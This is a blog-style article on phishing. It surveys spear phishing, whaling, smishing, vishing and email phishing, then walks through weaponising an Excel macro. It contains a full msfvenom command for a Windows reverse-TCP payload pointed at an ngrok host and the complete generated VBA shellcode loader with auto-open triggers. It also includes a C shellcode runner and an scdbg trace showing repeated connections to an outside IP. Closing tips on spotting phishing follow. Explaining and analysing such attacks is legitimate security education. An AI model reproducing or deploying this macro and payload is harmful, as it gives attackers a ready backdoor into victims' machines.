Click Me and I Shall Conquer!
An Art of Fooling Humans to Steal Your Data in One Click.
Have you ever heard a story about your acquaintances, say it your boss, your friends, or your family facing a new method of frauds, scams, or any kind of unexpected actions that bring a devastating blow of a data loss?
Backstory
In recent years, there are many of phishing attacks that are threatening not only in a corporates world that involve businesses, but also even nowadays, an irresponsible party targeted a specific individual to gain a special objectives of an unmannered actions. If we are talking about the data and the statistics of the cause, factors and impacts, those are already spread widely around the internet. Here are some blogs which talk about it:
- Truelist Phishing Statistic in a broad overview and how the world shall deal with it in upcoming years
- Usecure talks about the phishing trends and how they actually can be categorized
- ExpertInsights concludes everything about phishing and a countermeasure actions
Numerous statistic shows more than 50% cases of phishing is done successfully and this is one of the drawbacks of how the new disruptive technology plays the role today. The big question mark is how the threat actors could do it? Why are we convinced by their “sweet” tongue? How can we lose our data or even getting stolen by?
The following writing is going to discuss about a whole concept of scenario about how can a party could take an advantage of our own ego to get tricked so that they could compromise our system easily. It’s not stopping there, the writer also would elaborate each steps and tools specifically to dive deeper into those evil mediums in a curious perspectives, and in this context, an innocent Word/XLS document.
Phishing, but simplified.
Before proceeding into the further analysis, it’s the best for readers to understand what type of phishing that are well-known, how to know when we get those fraudulent messages in either general or business perspectives, and mitigate them. First, we’ll cover from the various form of phishing in general. According to Oxford dictionary,
Phishing medium is mostly known to be delivered through emails, but the truth is, there’s more than that.
🏹 Spear Phishing
Let’s say you have put a grudge on a company that kicks you out for no reason or in unethical way, or you want to put a revenge on your acquaintance who treats you bad. You’re starting on planning how bad would you want them to be angry or annoyed, or even causing a potential loss of their asset. This whole concept scenario is just like how we can describe a spear phishing.
This type of phishing generally targets someone or an institutes and in most cases, they are delivered through emails with a malicious attachments. Although there are more ways on some cases, but we’ll use the example of this scenario for the technical part later.
🐳 Whaling
Most types of phishing are differentiated by their own medium, but there’s a special case for whaling. Whaling is the same as spear phishing, but the target/victim is different. We can imagine how we see a regular fish and a whale is judged by its size for the first impression. A whale refers to a “big boss”, or a senior executives in a company.
Why does the attacker want to attack them? Simple. Those who had a higher positions or even the highest position have a bigger chance on having more permissions to do anything in the company. This gives an opportunity to the attacker once he/she can impersonate as a regular workers to trick them on doing something which gains a benefit to the attacker, such as transferring money to their own bank account.
📱 Smishing
Smishing is an abbreviation. The “Sm” part stands for SMS and you ‘d have already guessed what would it be for the rest part. This type of phishing is done via text messages. You might think that this is one of the easiest phishing that could be prevented easily since we can spot a fraud/scam messages directly. The interesting fact is that the smishing text messages mostly provides a malicious link that serves a fake websites that could imitate the official ones so sometimes people can get tricked by this one. Some says that the message is typical “too good to be true”.
🎤 Vishing
Have you ever watched this Youtube video which went viral 6 years ago? This is all about how a stranger could gain a personal benefit especially regarding to a personal sensitive information from the phone. Although the term is more related to social engineering attack, but this could also be called Vishing (Voice Phishing) as it extracts those sensitive information from her ‘voice’.
📨 Email Phishing
I’d consider this as the classic method yet it’s still very effective for an attacker to deliver their malicious intention from this medium. There are a certain malwares that uses email for a delivery so they could stay in dormant phase in the victim’s device, such as Emotet.
The Attack’s Plan via Document Attachment
We’ll have the scenario just like the mentioned image above. Suppose the victim has already viewed the mail and downloaded the given attachment. There’s a warning that the document may contains macros, but the victim doesn’t know anything about that and enabled it without awareness. A macros itself especially VBA macros is a visual basic application code to execute certain tasks through the custom user-generated functions and in this context, it’s pretty much built for malicious purpose.
What happen next is the attacker gained a reverse shell (the VBA macros has a capability for creating a back-connection to the attacker once it’s being enabled by the victim) so that he could access the internals of the victim’s OS, including documents and et cetera. I’ll use a simple method on how such attacker could create those malicious attachments such as document-based in less effort and it still works pretty much nowadays.
First, the attacker could use a tool called msfvenom that serves a lot of payloads for penetration testing and red-teaming stuffs. The command that will be used is the following,
msfvenom -p windows/shell/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=11189 -f vbaThe attacker used ngrok tunnel for the TCP listener so that once the macros is executed, the attacker will gain a reverse shell back (since the payload specified is a reverse TCP with Windows OS).
The generated malicious VBA will be look like this,
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Oysqscq As Long, ByVal Cnbm As Long, ByVal Axflal As LongPtr, Ajt As Long, ByVal Oeamvexov As Long, Tonmzz As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Ggmbv As Long, ByVal Gsguuiget As Long, ByVal Kibz As Long, ByVal Jnlbad As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Jtizx As LongPtr, ByRef Jmxhlh As Any, ByVal Locy As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Oysqscq As Long, ByVal Cnbm As Long, ByVal Axflal As Long, Ajt As Long, ByVal Oeamvexov As Long, Tonmzz As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Ggmbv As Long, ByVal Gsguuiget As Long, ByVal Kibz As Long, ByVal Jnlbad As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Jtizx As Long, ByRef Jmxhlh As Any, ByVal Locy As Long) As Long
#EndIf
Sub Auto_Open()
Dim Cihdith As Long, Gbru As Variant, Grnvw As Long
#If Vba7 Then
Dim Trnptmyb As LongPtr, Vnllfh As LongPtr
#Else
Dim Trnptmyb As Long, Vnllfh As Long
#EndIf
Gbru = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,139,66,60,1,208,87,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,49,255, _
73,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,3,128,107,74,104,2,0,43,181,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)
Trnptmyb = VirtualAlloc(0, UBound(Gbru), &H1000, &H40)
For Grnvw = LBound(Gbru) To UBound(Gbru)
Cihdith = Gbru(Grnvw)
Vnllfh = RtlMoveMemory(Trnptmyb + Grnvw, Cihdith, 1)
Next Grnvw
Vnllfh = CreateThread(0, 0, Trnptmyb, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End SubWhat’s that code? How does it work?
What you’re seeing here is a classic shellcode injection technique which is built in VBA. The shellcode itself is just like a bunch of computer instructions and this may conclude that our evil reverse-shell might be in this form. We’ll analyze the shellcode in the next section.
There are three famous Win32API functions that can be imported for this injection type, and they are CreateThread, VirtualAlloc, and RtlMoveMemory.
CreateThread , as can be seen from the code is derived from kernel32.dll Windows and its purpose is just like its name, to create a thread that will be executed in a VAS (Virtual Address Space) of the process that calls it.
VirtualAlloc is also derived from kernel32.dll Windows and it reserves a memory usually for process injection. If we take a look from the code, it receives 4 parameters. The first one contains the starting region to allocate the memory, the second contains the shellcode buffer, but the third and fourth parameters had a significant role for executing the shellcode. The value of the third parameter is 0x1000, which means it reserve and commit physical pages. This can be shown from the official MSDN documentation.
The fourth one will update the memory permission into PAGE_EXECUTE_READWRITE (value 0x40) and this is the same as RWX permission in ELF binary. VirtualAlloc itself can also be interpreted as the Windows mmap() function in C.
The last function is RtlMoveMemory, which responsibles for copying a buffer from the source address to other address just like memcpy() function in C. This function is called after VirtualAlloc is executed since the memory permission has to be updated first or the memory won’t become an executable region. Once done, CreateThread will be invoked last and executes the shellcode buffer from the Gbru variable.
The attacker then inserts the VBA into an Excel file and create a new module containing the generated code above. Once done, the attacker saves the file in an extension of .xlsm, means that the new spreadsheet file containing a macro-enabled configuration.
The attacker will have to make a convincing email messages so that it’s going to be flagged as a valid email from the victim’s perspectives. There are a lot of tools which can help them to make a phishing campaign.
Once the victim opens the document and enables the Macros, the attacker’s listener will receive the connection back and gain the shell. As a matter of fact, it only requires one single click and the backdoor is opened!
This step isn’t only for a malicious purpose but as a red teamer, they also may have to do a phishing campaign to their client’s employee (for example, a company A hires a red teamer from your security company). If you’re thinking the code is already too complex for such an end-user out there to spot your malicious Excel file, then you’re wrong. They need to figure out how to bypass AV & EDR solution so that their malicious file won’t get quarantined by them so it requires an advanced evasion technique. It could be an obfuscation or leveraging other applications to hide the attacker’s file.
Analyzing the Windows Shellcode , but with minimal effort ….
Now you’ve finally understood on how the code executes the shellcode, but some of you might still be curious on how it is built and what does it really consist of in a readable manner code. It’s possible to see what parameters and the execution flow (dynamically) from this evil payload. Although, we surely can’t execute shellcode with double-clicks. Yet, there’s a certain tool which can help us simply analyze it.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
unsigned char bytes[] = \
"THIS IS YOUR SHELLCODE IN BYTES";
int main() {
void* region = mmap(NULL,
sizeof(bytes),
PROT_WRITE | PROT_EXEC,
MAP_ANONYMOUS | MAP_PRIVATE,
-1,
0);
if(region == MAP_FAILED) {
perror("mmap");
return 1;
}
memcpy(region, bytes, sizeof(bytes));
printf("executing %ld bytes shellcode using mmap system call\n", sizeof(bytes));
((int(*)())region)();
//unreachable code
munmap(region, sizeof(bytes));
return 0;
}If we want to analyze a shellcode in Linux especially when dealing Linux Binary, we can create the C code above (taken from this awesome gist) and we may start debugging the binary once it calls the shellcode (usually there’s a certain call %register pattern for this).
We can also recreate the same functionality to Windows Shellcode by also reconstructing the VBA into C with the same Win32API functions (or we just want to debug it from the VBA directly, but preferred in Sandboxed Environment).
But if we want to run the shellcode easily, we can use a tool called scdbg. This tool can help us gain a simple insights when the shellcode is being run at runtime by checking what Win32API function is called.
The usage is pretty much simple, since all we had to do is to copy the shellcode into the file (preferred in Binary format or in Hexadecimal format). The mentioned shellcode is from the Gbru variable.
Gbru = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,139,66,60,1,208,87,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,49,255, _
73,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,3,128,107,74,104,2,0,43,181,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)Remove the _ as it’s only for line continuation and convert all the decimals to binary file.
Once done, we can run scdbg.exe and use the following flags parameter. The baba2.vir is a binary file that contains the shellcode which you;ve saved before.
As we can see, there are some Win32API functions called from the shellcode. Most of it derived from ws2_32.dll and this DLL responsibles for handling a sockets in Windows. The shellcode forces the victim to connect to 3[.]128[.]107[.]74:11189 which is the LPORT specified in the msfvenom payload and the IP Address reflects from our ngrok tunnel IP. Note that this is not always the case of completed Win32API functions as there might be another hidden API function calls.
What if we want to see the parameters passed to each function completely with those hidden API function calls? Simply adds the step count specifically, and since we don’t know how many step count are used in the shellcode, we can assume the step count is -1 since it’ll just states 0xffffffff.
scdbg.exe /s -1 /f baba2.vir
Loaded 161 bytes from file baba2.vir
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000
4010a9 LoadLibraryA(ws2_32)
4010b9 WSAStartup(190)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
401161 ExitProcess(0)
Stepcount 12226075As we can see, there’s another function like ExitProcess is called!
Conclusion
Digitalization brings both same amount of positive and negative impacts and this was just a slight of percentage that could affect your lifetime career to be doomed if you’re unlucky enough to get tricked once.
There are several tips that I’d recommend for you to prevent those phishing acts and I’ll choose email as the medium.
- Identify if the unknown message is too good to be true, contains a malicious hyperlinks (which you can hover first with your cursor), contains a malicious attachments with an unusual extensions, sense of urgency, or from an unusual sender. This is not always the case since it could be a valid one, but commonly they tend to be like that.
- Analyze the headers to check if email is already spoofed. This includes every components such as DMARC, DKIM and SPF. There’s an online solution for this such as mxtoolbox.com and mailheader.org.
- If you know what you’re doing, you can analyze the attachments by yourself in a sandbox environment.
Love my content? You can support me on Trakteer/BMC 😁. Thank you for reading this writings and I hope you gain a new knowledge from here!
